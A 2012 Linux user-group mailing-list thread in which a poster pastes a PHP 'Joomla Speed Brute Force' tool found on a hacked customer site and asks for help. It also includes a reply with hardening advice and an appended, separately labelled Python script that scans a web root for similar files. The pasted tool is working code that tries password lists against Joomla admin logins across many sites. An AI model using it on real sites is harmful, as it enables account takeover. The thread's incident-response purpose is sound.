[SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread David Lyon
I have a customer with a hacked website.

When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):

How did the hacker put it on my system? What could it have compromised? What
can I do to stop further consequences?

--- brut.php (don't run this) ---

body bgcolor=#808080

p align=centerbfont size=5 color=#FF#nbsp; GaStRo
-Dznbsp;nbsp; #/font/b/p
p align=centerbfont color=#FFJoomla Speed Brute
Force/font/b/p
form method=post action= enctype=multipart/form-data
p align=centerbfont color=#FFUsername/font/bfont
color=#FF:
input type=text name=usr value='admin' size=28  bEx: Admin ;
administrator/b/font/p
p align=centerfont color=#FFin , administrator ,  ..br
/fontbfont color=#FFsites list:/font/bfont
color=#FF
input type=file name=sites size=34/font/p
p align=centerfont color=#FFbr
/fontbfont color=#FFPass list/font/bfont color=#FF
input type=file name=w0rds size=35/font/p
p align=centerfont color=#FFbr
input type=submit name=x value=Start!
/font/p
/form
p align=centerfont color=#FFba href=http://Www.sec4ever.com

font color=#FFWww.sec4ever.com/font/a span
lang=ar-dz|/span
a href=http://Www.gastro-dz.net;font color=#FFWww.gastro-dz.net
/font/a
/b/font/p
p align=centerbfont color=#FFGreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi -  Al l
Dz Hackerz Team/font/b/p
p align=centernbsp;/p

?
@set_time_limit(0);
# joomla brute force
# Coded by Gastro
#Devloped by Gastro

if($_POST['x']){

echo hr;

$sites = explode(\n,file_get_contents($_FILES[sites][tmp_name])); //
Get Sites !

$w0rds = explode(\n,file_get_contents($_FILES[w0rds][tmp_name])); //
Get w0rdLiSt !

$Attack = new Joomla_brute_Force(); // Active Class

foreach($w0rds as $pwd){

foreach($sites as $site){

$Attack-check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}

}

}


# Class  Function'z

function txt_cln($value){  return str_replace(array(\n,\r),,$value);
}

class Joomla_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('com_config',$this-post($site,$user,$pass))){

echo b# login successful : $user:$pass - $site/bBR;
$f = fopen(j0s_result.txt,a+); fwrite($f , $user:$pass - $site\n);
fclose($f);
flush();
}else{ echo # Failed : $user:$pass - $siteBR; flush();}

}

public function post($site,$user,$pass){ // Post - user  pass

$token = $this-extract_token($site);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site./administrator/index.php);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'passwd='.$pass.'lang=en-GBoption=com_logintask=login'.$token.'=1');

curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for -
function post

$source = $this-get_source($site);

preg_match_all(/type=\hidden\ name=\([0-9a-f]{32})\ value=\1\/si
,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for - function
extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site./administrator/index.php);
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}

?
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html


Re: [SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread Mark Walkom
On 22 August 2012 12:00, David Lyon david.lyon.preissh...@gmail.com wrote:

 I have a customer with a hacked website.

 When I ftp'd to their web-server I found this wart (listed below - saved as
 brut.php):

 How did the hacker put it on my system? What could it have compromised? What
 can I do to stop further consequences?


Reset any management/admin passwords to be safe. Make sure everything
running on the server is up to date - OS, DB, Apache etc.

Get rid of FTP, use SCP and fail2ban.
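A defender's triage script for the questions in the original post, added here and not part of the thread: it sweeps a web root for other PHP files that share the traits of the quoted brut.php (the indicator patterns are drawn from the pasted script; the indicator names and the sample web root it builds are my own constructions) and reports mtime and mode so each hit can be matched against the FTP and Apache access logs.

```python
import os
import re
import stat
import tempfile
import time

# Traits lifted from the pasted brut.php; the indicator names are mine.
INDICATORS = {
    "posts to Joomla admin login": re.compile(r"administrator/index\.php"),
    "reads an uploaded list via $_FILES": re.compile(r"\$_FILES\[.*?\]\[.*?tmp_name"),
    "disables the execution time limit": re.compile(r"set_time_limit\s*\(\s*0\s*\)"),
    "keeps a cURL cookie jar": re.compile(r"CURLOPT_COOKIEJAR"),
    "appends to a results file": re.compile(r"fopen\s*\(.*?,\s*['\"]a\+?['\"]\s*\)"),
}

def score_php(source):  # names of every indicator present in one PHP source
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def scan_webroot(root, min_hits=2):
    """PHP files under root with >= min_hits traits; mtime/mode help match FTP and Apache logs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = score_php(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if len(hits) >= min_hits:
                st = os.stat(path)
                findings.append({"path": os.path.relpath(path, root), "hits": hits,
                                 "mtime": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(st.st_mtime)),
                                 "mode": oct(stat.S_IMODE(st.st_mode))})
    return sorted(findings, key=lambda f: f["path"])

def demo():
    """Constructed web root: a benign index.php plus a file with fragments of the brut.php traits."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php echo "hello"; ?>\n')
    with open(os.path.join(root, "images", "brut.php"), "w") as fh:
        fh.write('<?php @set_time_limit(0);\n'
                 '$sites = explode("\\n", file_get_contents($_FILES["sites"]["tmp_name"]));\n'
                 'curl_setopt($c, CURLOPT_URL, $site."/administrator/index.php");\n'
                 '$f = fopen("j0s_result.txt", "a+");\n')
    return scan_webroot(root)
```

Run `scan_webroot("/var/www")` (or wherever the customer's document root lives) and then look up each reported mtime in the FTP transfer log to see which account uploaded the file.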